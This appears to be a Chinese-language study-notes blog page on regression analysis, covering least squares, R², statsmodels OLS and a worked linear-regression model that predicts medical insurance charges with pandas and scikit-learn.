    # 将数据转化成独热编码, 即对非数值类型的字符进行分类转换成数字。用 0-1 表示,这就将许多指标划分成若干子列
    dummies = pd.get_dummies(data[classes])
    dummies
    region_northeast region_northwest region_southeast region_southwest
    0 0 0 0 1
    1 0 0 1 0
    2 0 0 1 0
    3 0 1 0 0
    4 0 1 0 0
    ... ... ... ... ...
    1333 0 1 0 0
    1334 1 0 0 0
    1335 0 0 1 0
    1336 0 0 0 1
    1337 0 1 0 0

    1338 rows × 4 columns

    # .join 将分类处理后的数据列添加进列表中
    # .drop 同时删除处理前的列,
    # 采用这种方式的好处:每列的名称不是无意义的
    data = data.join(dummies).drop(classes, axis = 1)
    # 新数据集
    print('汇总:', data.shape)
    data.head()
    汇总: (1338, 10)
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 19 0 27.900 0 1 16884.92400 0 0 0 1
    1 18 1 33.770 1 0 1725.55230 0 0 1 0
    2 28 1 33.000 3 0 4449.46200 0 0 1 0
    3 33 1 22.705 0 0 21984.47061 0 1 0 0
    4 32 1 28.880 0 0 3866.85520 0 1 0 0

    age, bmi, children 为连续型数据, 采用标准化的特征提取

    # 筛选出数据类型不是字符型的列
    num = ['age', 'bmi', 'children']
    standard_scaler = StandardScaler()
    data[num] = standard_scaler.fit_transform(data[num])
    data.head()
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 -1.438764 0 -0.453320 -0.908614 1 16884.92400 0 0 0 1
    1 -1.509965 1 0.509621 -0.078767 0 1725.55230 0 0 1 0
    2 -0.797954 1 0.383307 1.580926 0 4449.46200 0 0 1 0
    3 -0.441948 1 -1.305531 -0.908614 0 21984.47061 0 1 0 0
    4 -0.513149 1 -0.292556 -0.908614 0 3866.85520 0 1 0 0
    (3) 特征相关性分析
    cormatrix = data.corr()
    print("相关矩阵:\n",cormatrix)
    # 转化为一维表
    # 返回函数的上三角矩阵,把对角线上的置 0,让他们不是最高的。
    """
    用 corr()函数生成相关矩阵, 每个值都是数据集中各列的相关系数
    因为整个矩阵关于对角线对称, 因此只保留一半数据
    对角线为 1, 表示自己和自己, 没有分析意义, 置零
    """
    # np.tri()生成下三角矩阵,k=-1 即对角线向下偏移一个单位,对角线及以上元素全都置零
    # .T 矩阵转置,下三角矩阵转置变成上三角矩阵
    cormatrix *= np.tri(*cormatrix.values.shape, k=-1).T
    print("相关矩阵的上三角表示:\n",cormatrix)
    cormatrix = cormatrix.stack() # 利用 stack()进行数据重排,stack 以列为索引进行堆积
    print("相关矩阵:\n",cormatrix )
    # 返回某个变量和其他变量的相关性
    """
    以便观察相关性
    reindex(新索引):按新索引排序;
    abs():返回绝对值;
    sort_values():排序,ascending=False:升序,默认 true:升序;
    reset_index():将行索引转为新列的值,并命名 level_
    """
    cormatrix = cormatrix.reindex(cormatrix.sort_values(ascending=False).index).reset_index()
    cormatrix.columns = ["第一个变量", "第二个变量", "相关性"]
    cormatrix.head()
    相关矩阵:                        age       sex       bmi  children    smoker   charges  \age               1.000000 -0.020856  0.109272  0.042469 -0.025019  0.299008   sex              -0.020856  1.000000  0.046371  0.017163  0.076185  0.057292   bmi               0.109272  0.046371  1.000000  0.012759  0.003750  0.198341   children          0.042469  0.017163  0.012759  1.000000  0.007673  0.067998   smoker           -0.025019  0.076185  0.003750  0.007673  1.000000  0.787251   charges           0.299008  0.057292  0.198341  0.067998  0.787251  1.000000   region_northeast  0.002475 -0.002425 -0.138156 -0.022808  0.002811  0.006349   region_northwest -0.000407 -0.011156 -0.135996  0.024806 -0.036945 -0.039905   region_southeast -0.011642  0.017117  0.270025 -0.023066  0.068498  0.073982   region_southwest  0.010016 -0.004184 -0.006205  0.021914 -0.036945 -0.043210                     region_northeast  region_northwest  region_southeast  \age                       0.002475         -0.000407         -0.011642   sex                      -0.002425         -0.011156          0.017117   bmi                      -0.138156         -0.135996          0.270025   children                 -0.022808          0.024806         -0.023066   smoker                    0.002811         -0.036945          0.068498   charges                   0.006349         -0.039905          0.073982   region_northeast          1.000000         -0.320177         -0.345561   region_northwest         -0.320177          1.000000         -0.346265   region_southeast         -0.345561         -0.346265          1.000000   region_southwest         -0.320177         -0.320829         -0.346265                     region_southwest  age                       0.010016  sex                      -0.004184  bmi                      -0.006205  children                  0.021914  smoker                   -0.036945  charges                  -0.043210  region_northeast         -0.320177  region_northwest         -0.320829  region_southeast         -0.346265  region_southwest          1.000000  相关矩阵的上三角表示:                   age       sex       bmi  children    smoker   charges  \age               0.0 -0.020856  0.109272  0.042469 -0.025019  0.299008   sex              -0.0  0.000000  0.046371  0.017163  0.076185  0.057292   bmi               0.0  0.000000  0.000000  0.012759  0.003750  0.198341   children          0.0  0.000000  0.000000  0.000000  0.007673  0.067998   smoker           -0.0  0.000000  0.000000  0.000000  0.000000  0.787251   charges           0.0  0.000000  0.000000  0.000000  0.000000  0.000000   region_northeast  0.0 -0.000000 -0.000000 -0.000000  0.000000  0.000000   region_northwest -0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000   region_southeast -0.0  0.000000  0.000000 -0.000000  0.000000  0.000000   region_southwest  0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000                     region_northeast  region_northwest  region_southeast  \age                       0.002475         -0.000407         -0.011642   sex                      -0.002425         -0.011156          0.017117   bmi                      -0.138156         -0.135996          0.270025   children                 -0.022808          0.024806         -0.023066   smoker                    0.002811         -0.036945          0.068498   charges                   0.006349         -0.039905          0.073982   region_northeast          0.000000         -0.320177         -0.345561   region_northwest         -0.000000          0.000000         -0.346265   region_southeast         -0.000000         -0.000000          0.000000   region_southwest         -0.000000         -0.000000         -0.000000                     region_southwest  age                       0.010016  sex                      -0.004184  bmi                      -0.006205  children                  0.021914  smoker                   -0.036945  charges                  -0.043210  region_northeast         -0.320177  region_northwest         -0.320829  region_southeast         -0.346265  region_southwest          0.000000  相关矩阵: age               age                 0.000000                  sex                -0.020856                  bmi                 0.109272                  children            0.042469                  smoker             -0.025019                                        ...   region_southwest  charges            -0.000000                  region_northeast   -0.000000                  region_northwest   -0.000000                  region_southeast   -0.000000                  region_southwest    0.000000Length: 100, dtype: float64
    第一个变量 第二个变量 相关性
    0 smoker charges 0.787251
    1 age charges 0.299008
    2 bmi region_southeast 0.270025
    3 bmi charges 0.198341
    4 age bmi 0.109272

    自变量与因变量 charges 的相关性按降序排列:

    # 查看各个特征与 charges 的相关系数
    cormatrix2 = data.corr()
    cormatrix2['charges'].sort_values(ascending =False) # 特征选择
    charges             1.000000smoker              0.787251age                 0.299008bmi                 0.198341region_southeast    0.073982children            0.067998sex                 0.057292region_northeast    0.006349region_northwest   -0.039905region_southwest   -0.043210Name: charges, dtype: float64
    (4) 特征选择

    选取各个特征相关系数最大的前 6 个特征, 重新构建数据集

    data_X = pd.concat([data['smoker'], data['age'], data['bmi'], data['region_southeast'],
    data['children'], data['sex'], data['charges']], axis=1)
    data_X.head()
    smoker age bmi region_southeast children sex charges
    0 1 -1.438764 -0.453320 0 -0.908614 0 16884.92400
    1 0 -1.509965 0.509621 1 -0.078767 1 1725.55230
    2 0 -0.797954 0.383307 1 1.580926 1 4449.46200
    3 0 -0.441948 -1.305531 0 -0.908614 1 21984.47061
    4 0 -0.513149 -0.292556 0 -0.908614 1 3866.85520

    3 建立模型

    (1) 分离自变量和因变量
    # 分离因变量
    target = data_X.charges
    # 分离自变量
    features = data_X.drop(columns=['charges'])
    (2) 检查因变量数据是否满足正态分布
    # 分析医疗费用的分布是否符合正态
    x = target
    sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
    hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
    ###有警告信息###<AxesSubplot:xlabel='charges', ylabel='Density'>

    png

    保险分布的数据右偏(平均数大于中位数)

    可以采用取对数, 去平方根的方法将大的数据向左移

    # log(1 + x)
    target = np.log1p(target)
    # 分析医疗费用的分布是否符合正态
    x = target
    sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
    hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
    ###有警告信息###<AxesSubplot:xlabel='charges', ylabel='Density'>

    png

    (3) 划分数据集, 建立训练数据集和测试数据集
    # 划分数据集,sklearn.model_selection.train_test_split 随机划分训练集和测试集
    seed = 123 # 随机种子数
    X_train, X_test, y_train, y_test = train_test_split(features, target, test_size = 0.3,
    random_state = seed) # 设置 70%为训练数据
    print("训练集", X_train.shape, ",测试集", X_test.shape)
    训练集 (936, 6),测试集 (402, 6)
    (4) 使用线性回归创建模型
    # 第 1 步:导入线性回归
    from sklearn.linear_model import LinearRegression
    # 第 2 步:创建模型:线性回归
    model = LinearRegression()
    # 第 3 步:训练模型
    model.fit(X_train,y_train)
    # 获得线性回归模型的参数
    a = model.intercept_#截距
    b = model.coef_#回归系数
    print("最佳拟合线:截距",a,"\n 回归系数:",b)
    最佳拟合线:截距 8.851551231348216 回归系数:[ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]

    4 评估模型

    # 对线性回归进行预测
    y_pred = model.predict(X_test)
    # 评价回归模型
    score=model.score(X_test, y_test) # 查看判定系数的方法一
    print("个人医保数据线性回归模型的决定系数即 R 平方为:",score)
    from sklearn.metrics import explained_variance_score,mean_absolute_error,\
    mean_squared_error,median_absolute_error,r2_score

    print("个人医保数据线性回归模型的平均绝对误差为:",mean_absolute_error(y_test,y_pred))
    print("个人医保数据线性回归模型的均方误差 MSE 为:", mean_squared_error(y_test,y_pred))
    print("个人医保数据线性回归模型的中值绝对误差为:",median_absolute_error(y_test,y_pred))
    print("个人医保数据线性回归模型的可解释方差值为:", explained_variance_score(y_test,y_pred))
    # 查看判定系数的方法二
    print("个人医保数据线性回归模型的判定系数即 R 平方为:",r2_score(y_test,y_pred))
    个人医保数据线性回归模型的决定系数即 R 平方为:0.7830070691295015个人医保数据线性回归模型的平均绝对误差为:0.2707571270860692个人医保数据线性回归模型的均方误差 MSE 为:0.17131210181347262个人医保数据线性回归模型的中值绝对误差为:0.14746506518623992个人医保数据线性回归模型的可解释方差值为:0.7831735070420169个人医保数据线性回归模型的判定系数即 R 平方为:0.7830070691295015

    通过交叉验证来持续优化模型(十折交叉验证)

    十折交叉验证,英文名叫做 10-fold cross-validation,用来测试算法准确性。是常用的测试方法。将数据集分成十份,轮流将其中 9 份作为训练数据,1 份作为测试数据,进行试验。

    # 交叉验证
    from sklearn.model_selection import cross_val_predict
    predicted = cross_val_predict(model,features, target,cv=10)
    # 获得线性回归模型的参数
    a=model.intercept_ # 截距
    b=model.coef_ # 回归系数
    print("最佳拟合线:截距",a,"\n 回归系数:",b)
    print("个人医保数据线性回归模型的平均绝对误差为:",mean_absolute_error(target,predicted))
    print("个人医保数据线性回归模型的均方误差 MSE 为:", mean_squared_error(target,predicted))
    print("个人医保数据线性回归模型的中值绝对误差为:",median_absolute_error(target,predicted))
    print("个人医保数据线性回归模型的可解释方差值为:",
    explained_variance_score(target,predicted))
    print("个人医保数据线性回归模型的判定系数即 R 平方为:",r2_score(target,predicted))
    最佳拟合线:截距 8.851551231348216 回归系数:[ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]个人医保数据线性回归模型的平均绝对误差为:0.28154076344034734个人医保数据线性回归模型的均方误差 MSE 为:0.20010936615767003个人医保数据线性回归模型的中值绝对误差为:0.13490158250103956个人医保数据线性回归模型的可解释方差值为:0.7630797649634316个人医保数据线性回归模型的判定系数即 R 平方为:0.7630793987615034

    14.9 高手点拨

    解析法梯度下降法
    要求$(\mathbf X^T\mathbf X)$必须可逆不要求$(\mathbf X^T\mathbf X)$可逆
    求$(\mathbf X^T\mathbf X)$的逆费时较多, 当特征较多时运算很慢特征较多时运算不会特别慢
    不需要特征缩放需要特征缩放
    只需计算一次就能求解需要多次迭代
    不需要选择学习步长需要选择学习步长
    对于更复杂的问题可能求不出解可用于更复杂的问题, 可移植性强

    具体地说, 只要特征变量的数量小于 10000, 通常会使用解析法, 而不是梯度下降法

    ]]>
    + 正文

    14 回归分析

    14.1 回归分析概述

    14.1.2 一元线性回归模型

    一般地, 如果自变量$x$与因变量$y$之间存在如下关系, 则可称为一元线性回归模型

    $$y=\beta_0+\beta_1x+\varepsilon, \varepsilon\sim N(0, \sigma^2)$$

    变量说明
    $x$自变量
    $y$因变量
    $\beta_0$回归常数
    $\beta_1$回归系数
    $\varepsilon$随机误差
    $\sigma^2$方差

    14.2 回归方程推导及作用

    14.2.1 回归方程

    通过观察$n$组样本观察值, 求出未知参数$\beta_0$和$\beta_1$, 记为$\hat{\beta_0}, \hat{\beta_1}$, 则称$\hat{y}=\hat{\beta_0}+\hat{\beta_1}x
    $为$y$关于$x$的经验回归方程, 简称回归方程

    14.2.2 参数的最小二乘法估计

    二乘~乘两次~平方

    基本原则: 最优拟合直线应该使各点到回归直线的距离之和最小, 即平方和最小

    $$Q=\Sigman_{i=1}(y_i-\beta_0-\beta_1x_i)2$$

    求得

    $$\left{\begin{matrix}
    \beta_0=\bar y-\beta_1\bar x\
    \beta_1=\frac{\Sigma^n_{i=1}x_iy_i-n\bar x\bar y}{\Sigman_{i=1}x2_i-n\bar x^2}=\frac{L_{xy}}{L_{xx}}
    \end{matrix}\right.$$

    例 14.2 求线性回归方程

    某公司为了研究某一类产品的产值$x$(万元)和其毛利润$y$(万元)之间的关系:

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    import pandas as pd

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    df = pd.DataFrame(tang, columns=range(1, 11), index=["产值 x", "毛利润 y"])
    df.columns.name = "月份"
    df
    月份 1 2 3 4 5 6 7 8 9 10
    产值 x 100 110 120 130 140 150 160 170 180 190
    毛利润 y 45 51 54 61 66 70 74 78 85 89

    求毛利润$y$关于产值$x$的线性回归方程

    $n=10, \bar x=\frac{1}{n}\Sigma^n_{i=1}x_i=145, \bar y=\frac{1}{n}\Sigma^n_{i=1}y_i=67.3$

    1
    2
    3
    4
    n = len(tang[0])
    x_bar = tang[0].mean()
    y_bar= tang[1].mean()
    n, x_bar, y_bar
    (10, 145.0, 67.3)

    $L_{xx}=\Sigman_{i=1}x2_i-n\bar x^2=8250$

    $L_{xy}=\Sigma^n_{i=1}x_iy_i-n\bar x\bar y=3985$

    1
    2
    3
    L_xx = (tang[0] ** 2).sum() - n * x_bar ** 2
    L_xy = (tang[0] * tang[1]).sum() - n * x_bar * y_bar
    L_xx, L_xy
    (8250.0, 3985.0)

    $\hat{\beta_1}=\frac{L_{xy}}{L_{xx}}=\frac{3985}{8250}=0.48303$

    $\hat{\beta_0}=\bar y-\hat{\beta_1}\bar x=67.3-0.48303 * 145 = -2.73935$

    得回归方程:

    $\hat y = -2.73935+0.48303x$

    1
    2
    3
    beta_1 = L_xy / L_xx
    beta_0 = y_bar - beta_1 * x_bar
    beta_0, beta_1
    (-2.739393939393949, 0.48303030303030303)

    用 sklearn 实现线性回归方程

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import numpy as np
    import matplotlib.pyplot as plt
    import pandas as pd
    from sklearn import linear_model

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    regr = linear_model.LinearRegression()
    """
    https://www.iotword.com/2556.html
    .reshape(-1, 1)
    这是由于在 sklearn 中,所有的数据都应该是二维矩阵,哪怕它只是单独一行或一列(比如前面做预测时,仅仅只用了一个样本数据),
    所以需要使用 numpy 库的.reshape(1,-1)进行转换,而 reshape 的意思以及常用用法即上述内容。
    """
    regr.fit(tang[0].reshape(-1, 1), tang[1].reshape(-1, 1))
    regr.intercept_[0], regr.coef_[0][0]
    (-2.739393939393949, 0.48303030303030303)
    1
    2
    3
    4
    5
    6
    plt.figure()
    plt.scatter(tang[0], tang[1])
    x = np.array([100, 190])
    y = regr.predict(x.reshape(-1, 1))
    plt.plot(x, y, color="red", alpha=0.75)
    plt.show()

    png

    14.2.3 方差$\sigma^2$的估计

    $\sigma2$的无偏估计$(E(\hat{\sigma2})=0)\hat{\sigma^2}$:

    $\hat{\sigma^2}=\frac{1}{n-2}(L_{yy}-\hat{\beta_1}L_{xy})$其中$L_{yy}=\Sigma^n_{i=1}(y_i-\bar y)^2=\Sigma^n_{i=1}y^2_i-n\bar y^2$

    14.3 回归直线拟合度

    14.3.1 因变量 y 变化的指标项

    • 总离差平方和(SST): $\Sigma^n_{i=1}(y_i-\bar y_i)^2$, 反映了因变量的$n$个观察值$y_i$与其均值$\bar y$的总离差

    • 回归平方和(SSR): $\Sigma^n_{i=1}(\hat y_i-\bar y_i)^2$, 反映了因变量的总变化中, 有$x$与$y$之间的线性关系引起的$y$的变化部分

    • 残差平方和(SSE): $\Sigma^n_{i=1}(y_i-\hat y_i)^2$, 反映了除$x$对$y$的线性影响之外的其他因素对$y$变化的作用, 不能由回归直线来解释$y$的变化部分

    SST = SSR + SSE

    14.3.2 判定系数

    $$R^2=\frac{SSR}{SST}=\frac{\hat{\beta_1}L_{xy}}{L_{yy}}$$

    其实就是皮尔森相关系数的平方…

    14.4 线性回归的模型检验

    14.4.1 线性关系的显著性检验

    14.4.2 回归系数的显著性检验

    代公式吧…累了

    14.5 利用回归直线进行估计和预测

    什么是预测区间和置信区间

    • 预测区间估计: 对于自变量$x$的给定值$x_0$, 对$y$的预测值$\hat{y_0}$作点估计以区间估计(个别值)

    • 置信区间估计: 对于自变量$x$的给定值$x_0$, 估计$y_0$的平均值及估计区间, 即估计平均值$E(\hat{y_0})$

    代公式吧…累了

    14.6 多元与曲线回归问题

    14.6.1 多元线性回归分析

    多元线性回归就是多个自变量一个因变量的线性回归问题

    直接举例吧, 不证明了

    例 14.8

    设有 1 个表示 4 个特征(自变量)和 1 个因变量的数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np
    import pandas as pd

    data = np.array([[2104, 5, 1, 15, 368],
    [1416, 3, 2, 10, 200],
    [1534, 3, 2, 5, 280],
    [852, 2, 1, 7, 126]])
    df = pd.DataFrame(data, columns=["x1", "x2", "x3", "x4", "y"])
    df
    x1 x2 x3 x4 y
    0 2104 5 1 15 368
    1 1416 3 2 10 200
    2 1534 3 2 5 280
    3 852 2 1 7 126

    利用"最小二乘法"求解回归模型时, 需要将特征(自变量)和因变量分解:

    $\mathbf{X}= \begin{bmatrix}
    1 & 2104 & 5 & 1 & 15 \
    1 & 1416 & 3 & 2 & 10 \
    1 & 1534 & 3 & 2 & 5 \
    1 & 852 & 2 & 1 & 7
    \end{bmatrix}$,
    $\mathbf{Y}= \begin{bmatrix}
    368 \
    200 \
    280 \
    126
    \end{bmatrix}$, $\mathbf{X}$增加 1 列对应的是$\beta_0$的系数

    1
    2
    3
    X = np.hstack((np.mat([[1], [1], [1], [1]]),np.mat(data.T[0:4]).T))
    Y = np.mat(data.T[4]).T
    X, Y
    (matrix([[   1, 2104,    5,    1,   15],         [   1, 1416,    3,    2,   10],         [   1, 1534,    3,    2,    5],         [   1,  852,    2,    1,    7]]), matrix([[368],         [200],         [280],         [126]]))

    带入参数公式:$\beta=(\mathbf X^T\mathbf X)^{-1}(\mathbf X^T\mathbf Y)$, 解得

    1
    2
    beta = (X.T * X) ** (-1) * (X.T * Y)
    beta
    matrix([[-5632.],        [    8.],        [-4096.],        [    0.],        [    0.]])

    $y=-5632+8x_1-4096x_2$

    14.6.2 曲线回归分析

    曲线回归通常才用代数代换法把非线性形式转换为线性形式处理

    14.7 Python 工具包

    14.7.2 利用 statsmodels 实现回归分析

    例 14.11

    设产生 50~个-10~10 的等差数列数作为自变量$x$, 因变量为$y=3+6x+2x^3+e$, 其中$e$为误差项, $e\sim N(0, 1)$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    import numpy as np
    import matplotlib.pyplot as plt
    import statsmodels.api as sm # 最小二乘法
    from statsmodels.stats.outliers_influence import summary_table

    # 回归公式是: y=3+6x+2x^3+e
    # 1、设定数据量
    nsample = 50
    # 2、创建一个表示 x 的 array。这里,设 x 的值是-10 到 10 等差排列,共 50 个数。
    x = np.linspace(-10,10, nsample)
    X = np.column_stack((x,x**3))
    # 3、使用 sm.add_constant() 在 array 上加入一列常项 1。
    X = sm.add_constant(X) #线性组合,在原始数据前加 1
    # 4、设置模型里的 β0,β1,β2,这里要设置成 3、6 和 2。
    beta = np.array([3,6,2]) #β0, β1,β2 分别为 3、6 和 2
    #5、误差分析,在数据中加上误差项。
    e = np.random.normal(size=nsample)
    # 6、实际值 y
    y = np.dot(X, beta) + e # 回归公式是: y = 3 + 6x + 2x ^ 3 + e
    # 7、最小二乘法
    model = sm.OLS(y,X)
    # 8、拟合数据
    res = model.fit()
    # 9、获取结果,输出图形
    # 调取计算出的拟合回归模型参数即回归系数
    print("回归方程的参数 ===",res.params)
    # 调用拟合结果的 fittedvalues 得到拟合的 y_pred 值
    y_pred = res.fittedvalues
    # 将拟合结果画出来
    fig, ax = plt.subplots()
    ax.scatter(x, y, label="training data")
    ax.plot(x,y_pred, 'r', label='predict')
    ax.legend()
    ax.set(xlabel='x', ylabel='y')
    plt.show()
    # 将回归拟合的摘要全部打印出来
    res.summary()
    回归方程的参数 === [2.98049789 6.02186784 1.99927762]

    png

    OLS Regression Results
    Dep. Variable: y R-squared: 1.000
    Model: OLS Adj. R-squared: 1.000
    Method: Least Squares F-statistic: 2.098e+07
    Date: Mon, 25 Jul 2022 Prob (F-statistic): 1.44e-140
    Time: 15:39:09 Log-Likelihood: -64.732
    No. Observations: 50 AIC: 135.5
    Df Residuals: 47 BIC: 141.2
    Df Model: 2
    Covariance Type: nonrobust
    coef std err t P>|t| [0.025 0.975]
    const 2.9805 0.129 23.138 0.000 2.721 3.240
    x1 6.0219 0.055 109.986 0.000 5.912 6.132
    x2 1.9993 0.001 2486.102 0.000 1.998 2.001
    Omnibus: 4.258 Durbin-Watson: 1.994
    Prob(Omnibus): 0.119 Jarque-Bera (JB): 3.257
    Skew: 0.437 Prob(JB): 0.196
    Kurtosis: 3.894 Cond. No. 401.


    Notes:
    [1] Standard Errors assume that the covariance matrix of the errors is correctly specified.

    statsmodels 中的 summary 解读(使用 OLS)

    14.8 综合分析——个人医疗保费预测服务

    保险公司向保险人收取的保险费,必须高于支付给被保险人的保险费才能获利。

    以医疗费用为例,通过分析病人的数据,来预测这部分群体的平均医疗费用,为年度保费价格的设定提供参考。

    通过不同病人的病人的数据来预测医疗费用,因为因变量是一个连续的值,所以这个问题是一个回归问题。

    准备工作:调用相关库

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import numpy as np
    import pandas as pd
    # 导入数据可视化包及缺失值处理相关的工具包 data visualization and missing values
    import matplotlib.pyplot as plt
    import seaborn as sns # seaborn 库
    %matplotlib inline
    #导入缺失值处理的库
    import missingno as msno # 缺失值
    # 机器学习的工具包 machine learning
    from sklearn.preprocessing import StandardScaler # 标准化库
    from sklearn.model_selection import train_test_split, cross_val_score # 分割数据集,交叉验证评分

    1 获取数据和观察数据

    1
    2
    3
    4
    # 获取数据
    data = pd.read_csv("insurance.csv")
    # 查看数据大小
    data.shape
    (1338, 7)
    1
    2
    # 查看数据的列名
    data.columns
    Index(['age', 'sex', 'bmi', 'children', 'smoker', 'region', 'charges'], dtype='object')
    1
    2
    # 查看数据的前 5 行
    data.head()
    age sex bmi children smoker region charges
    0 19 female 27.900 0 yes southwest 16884.92400
    1 18 male 33.770 1 no southeast 1725.55230
    2 28 male 33.000 3 no southeast 4449.46200
    3 33 male 22.705 0 no northwest 21984.47061
    4 32 male 28.880 0 no northwest 3866.85520
    变量描述
    age年龄(不超过 64 岁)
    sex性别
    bmi体重(kg)/身高(米)²
    children孩子/受抚养者数量
    smoker吸烟情况
    region居住地(美国各地理区域)
    charges因变量, 当前数据人上年度保险的额度
    1
    2
    # 查看数据类型
    data.dtypes
    age           int64sex          objectbmi         float64children      int64smoker       objectregion       objectcharges     float64dtype: object
    1
    2
    # 生成描述性统计
    data.describe()
    age bmi children charges
    count 1338.000000 1338.000000 1338.000000 1338.000000
    mean 39.207025 30.663397 1.094918 13270.422265
    std 14.049960 6.098187 1.205493 12110.011237
    min 18.000000 15.960000 0.000000 1121.873900
    25% 27.000000 26.296250 0.000000 4740.287150
    50% 39.000000 30.400000 1.000000 9382.033000
    75% 51.000000 34.693750 2.000000 16639.912515
    max 64.000000 53.130000 5.000000 63770.428010
    (1) 缺失值处理
    • 若缺失值意义不大, 可以直接删除

    如果缺失值有意义:

    • 缺失值较少, 可以直接去掉

    • 用已有的值的平均值或众数代替缺失值

    • 用已知的数据作回归模型, 进行预测, 再用其他特征数据预测缺失值

    1
    2
    3
    # 可视化缺失值
    sns.set(style="ticks") # 设置样式背景
    msno.matrix(data)
    <AxesSubplot:>

    png

    可惜了, 没有缺失值

    2 探索数据和准备数据

    (2) 特征工程

    从原始数据中提取到的特征的好坏直接影响模型的效果, 特征工程就是从原式数据中最大限度地提取特征, 以供机器学习和算法使用

    类型提取方法
    数值类型直接使用或进行标准化处理
    时间序列转化成单独的年月日
    分类数据使用标签编码(类别只有两个, 如男=1, 女=0)或独热编码(类别超过两个)
    其他类型独热编码

    标签编码: 使用 map 函数对数据进行重新定义Pandas 中的宝藏函数-map

    1
    2
    3
    4
    5
    6
    7
    8
    # 将是否吸烟者的值映射为数值,yes 对应数值 1,no 对应数值 0
    smoker_Dict = {'yes':1,'no':0}
    data['smoker'] = data['smoker'].map(smoker_Dict)
    data.head()
    # 将性别的值映射为数值,男(male)对应数值 1,女(female)对应数值 0
    sex_Dict = {'female':0,'male':1}
    data['sex']= data['sex'].map(sex_Dict)
    data.head()
    age sex bmi children smoker region charges
    0 19 0 27.900 0 1 southwest 16884.92400
    1 18 1 33.770 1 0 southeast 1725.55230
    2 28 1 33.000 3 0 southeast 4449.46200
    3 33 1 22.705 0 0 northwest 21984.47061
    4 32 1 28.880 0 0 northwest 3866.85520
    1
    2
    3
    4
    classes = ['region']
    # 将数据转化成独热编码, 即对非数值类型的字符进行分类转换成数字。用 0-1 表示,这就将许多指标划分成若干子列
    dummies = pd.get_dummies(data[classes])
    dummies
    region_northeast region_northwest region_southeast region_southwest
    0 0 0 0 1
    1 0 0 1 0
    2 0 0 1 0
    3 0 1 0 0
    4 0 1 0 0
    ... ... ... ... ...
    1333 0 1 0 0
    1334 1 0 0 0
    1335 0 0 1 0
    1336 0 0 0 1
    1337 0 1 0 0

    1338 rows × 4 columns

    1
    2
    3
    4
    5
    6
    7
    # .join 将分类处理后的数据列添加进列表中
    # .drop 同时删除处理前的列,
    # 采用这种方式的好处:每列的名称不是无意义的
    data = data.join(dummies).drop(classes, axis = 1)
    # 新数据集
    print('汇总:', data.shape)
    data.head()
    汇总: (1338, 10)
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 19 0 27.900 0 1 16884.92400 0 0 0 1
    1 18 1 33.770 1 0 1725.55230 0 0 1 0
    2 28 1 33.000 3 0 4449.46200 0 0 1 0
    3 33 1 22.705 0 0 21984.47061 0 1 0 0
    4 32 1 28.880 0 0 3866.85520 0 1 0 0

    age, bmi, children 为连续型数据, 采用标准化的特征提取

    1
    2
    3
    4
    5
    # 筛选出数据类型不是字符型的列
    num = ['age', 'bmi', 'children']
    standard_scaler = StandardScaler()
    data[num] = standard_scaler.fit_transform(data[num])
    data.head()
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 -1.438764 0 -0.453320 -0.908614 1 16884.92400 0 0 0 1
    1 -1.509965 1 0.509621 -0.078767 0 1725.55230 0 0 1 0
    2 -0.797954 1 0.383307 1.580926 0 4449.46200 0 0 1 0
    3 -0.441948 1 -1.305531 -0.908614 0 21984.47061 0 1 0 0
    4 -0.513149 1 -0.292556 -0.908614 0 3866.85520 0 1 0 0
    (3) 特征相关性分析
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    cormatrix = data.corr()
    print("相关矩阵:\n",cormatrix)
    # 转化为一维表
    # 返回函数的上三角矩阵,把对角线上的置 0,让他们不是最高的。
    """
    用 corr()函数生成相关矩阵, 每个值都是数据集中各列的相关系数
    因为整个矩阵关于对角线对称, 因此只保留一半数据
    对角线为 1, 表示自己和自己, 没有分析意义, 置零
    """
    # np.tri()生成下三角矩阵,k=-1 即对角线向下偏移一个单位,对角线及以上元素全都置零
    # .T 矩阵转置,下三角矩阵转置变成上三角矩阵
    cormatrix *= np.tri(*cormatrix.values.shape, k=-1).T
    print("相关矩阵的上三角表示:\n",cormatrix)
    cormatrix = cormatrix.stack() # 利用 stack()进行数据重排,stack 以列为索引进行堆积
    print("相关矩阵:\n",cormatrix )
    # 返回某个变量和其他变量的相关性
    """
    以便观察相关性
    reindex(新索引):按新索引排序;
    abs():返回绝对值;
    sort_values():排序,ascending=False:升序,默认 true:升序;
    reset_index():将行索引转为新列的值,并命名 level_
    """
    cormatrix = cormatrix.reindex(cormatrix.sort_values(ascending=False).index).reset_index()
    cormatrix.columns = ["第一个变量", "第二个变量", "相关性"]
    cormatrix.head()
